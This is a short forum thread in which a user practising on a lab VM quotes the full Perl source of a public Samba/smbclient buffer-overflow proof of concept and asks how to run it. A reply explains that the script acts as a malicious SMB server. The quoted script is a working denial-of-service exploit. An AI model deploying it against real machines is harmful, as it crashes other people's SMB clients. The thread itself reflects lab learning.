Ready to Start Your Career?

January 1, 2016
Samba Buffer Overflow Exploit

January 1, 2016
I've Googled to my wits end. I can't find an example of how to actually utilize this particular buffer overflow. I have a VM running Samba 3.0.28a - vulnerable to a buffer overflow. The exploit can be found in Kali at /usr/share/exploitdb/platforms/multiple/dos/5712.pl. How can I actually USE the code? I can't figure out what I need to do to run the exploit against my vulnerable VM from Kali. Running the perl script yields nothing. Can anyone please shed light on this? The code for the exploit is below: #!/usr/bin/perl # 06/01/2008 - k`sOSe # # ~ # smbclient //localhost/w00t # \*\*\* glibc detected \*\*\* smbclient: free(): invalid next size (fast): 0x0823c2d8 \*\*\* # use warnings; use strict; use IO::Socket; my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '445', Listen => 1, Reuse => 1) || die($!); while(my $csock = $sock->accept()) { print $csock "\\x00" . "\\x01\\xff\\xff" . "\\x41" x 131071; }
Hi there! Please provide a CVE ID too when you post public exploit code. ```my $sock = IO::Socket::INET->new(LocalAddr => ‘0.0.0.0’, LocalPort => ‘445’, Listen => 1, Reuse => 1) || die($!);``` Looks like a Server is being started for the service. So you have to connect the vulnerable machine's Client to your Sever